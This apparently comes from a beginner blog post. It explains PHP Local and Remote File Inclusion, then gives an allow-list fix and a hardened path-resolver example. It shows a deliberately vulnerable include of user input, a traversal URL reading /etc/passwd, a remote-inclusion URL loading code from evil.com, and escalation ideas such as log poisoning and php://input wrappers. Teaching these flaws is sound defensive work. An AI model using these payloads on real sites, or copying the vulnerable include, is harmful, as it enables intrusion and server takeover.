Every website reads files — like showing you a page called "home.php" or "about.php". But what if a hacker tricks your website into reading the wrong file — maybe one that stores passwords or secret code? 😱

That's what LFI (Local File Inclusion) and RFI (Remote File Inclusion) are all about. They sound technical, but they're really just two ways a website can be fooled into including files it shouldn't.

🏠 LFI — Local File Inclusion (Reading Local Files)

Imagine your website has this code 👇

<?php
$page = $_GET['page'];
include $page;
?>

If a hacker visits:

http://example.com/index.php?page=../../etc/passwd

The website might include a local file like /etc/passwd — revealing sensitive data on the server. 😬

🧠 In short: LFI happens when attackers make your site include local files on the same server.

🌍 RFI — Remote File Inclusion (Running Remote Files)

Now imagine if your server allows loading files from other websites. The hacker can try:

http://example.com/index.php?page=http://evil.com/shell.txt

If the setting allow_url_include is ON, your website fetches and runs that remote code — giving the attacker full control! 😨

🧠 In short: RFI happens when attackers include and execute remote (outside) files.

💥 How Attackers Can Make It Worse

Once they find LFI/RFI, attackers may:

  • Read sensitive files like /etc/passwd 🧾
  • Inject malicious code into logs (log poisoning) 💀
  • Upload fake "image" files that contain PHP code 🧠
  • Use wrappers like php://input to execute hidden scripts ⚙️

So, a small inclusion bug can quickly turn into a remote code execution (RCE) attack.

🛡️ How to Prevent It

Don't use user input in file includes — ever. ✅ Use a whitelist of allowed pages, like:

<?php
// The request selects a key; the file name comes only from this fixed map.
$pages = ['home' => 'home.php', 'about' => 'about.php'];
$page = $_GET['page'] ?? '';
if (!isset($pages[$page])) die("Invalid page!");
include $pages[$page];

  • Turn off risky settings: allow_url_include=Off
  • Validate input & sanitize file paths.
  • Keep uploads and logs outside the web folder.
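As an added example (not code from the original post), here is a hardened version of the allow-list idea that also checks the resolved path, so even a listed name cannot escape the pages folder or reach a stream wrapper. It assumes a pages directory that it creates itself for the demo; in a real app the input would come from $_GET['page'].

```php
<?php
// Added example: allow-list plus resolved-path check for a page include.
declare(strict_types=1);

function resolve_page(string $requested, string $pagesDir, array $allowed): ?string
{
    // 1. Only plain page names: no slashes, dots, null bytes or "php://" schemes.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $requested)) {
        return null;
    }
    // 2. Allow-list: the request chooses a key, never a file name or path.
    if (!array_key_exists($requested, $allowed)) {
        return null;
    }
    // 3. Resolve the final path and require it to stay inside $pagesDir.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // missing file, symlink escape or anything outside the folder
    }
    return $path;
}

// Demo with a constructed pages directory (assumed layout, created here).
$pagesDir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($pagesDir);
file_put_contents("$pagesDir/home.php", "<?php echo \"home page\\n\";");
// 'about' is allow-listed but its file is deliberately absent.
$allowed = ['home' => 'home.php', 'about' => 'about.php'];

// Constructed sample inputs, including the attack strings shown in the post.
$tests = ['home', 'about', '../../etc/passwd',
          'http://evil.com/shell.txt', 'php://input', "home\0"];
foreach ($tests as $input) {
    $resolved = resolve_page($input, $pagesDir, $allowed);
    printf("%-32s => %s\n", json_encode($input),
           $resolved === null ? 'REJECTED' : 'include ' . basename($resolved));
    if ($resolved !== null) {
        include $resolved; // only ever a file from inside $pagesDir
    }
}

unlink("$pagesDir/home.php");
rmdir($pagesDir);
```

Only "home" is included; "about" is rejected because realpath() fails on the missing file, and every traversal, URL and wrapper string fails the name check before any file system call.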

⚖️ Quick Difference

🗂️ LFI — Loads local files from the server (reads or leaks data).

🌐 RFI — Loads remote files from another website (can run code instantly).

🧪 Want to Practice Safely?

Try DVWA (Damn Vulnerable Web App) or TryHackMe's LFI labs — they let you learn in a legal, controlled environment. 💻🧠

✨ Conclusion

LFI and RFI happen when websites include files based on user input without checking them properly.

🧠 Remember:

Never trust user input — especially when it decides what your website reads or runs!

A few simple lines of validation can save your entire server. 🔒💪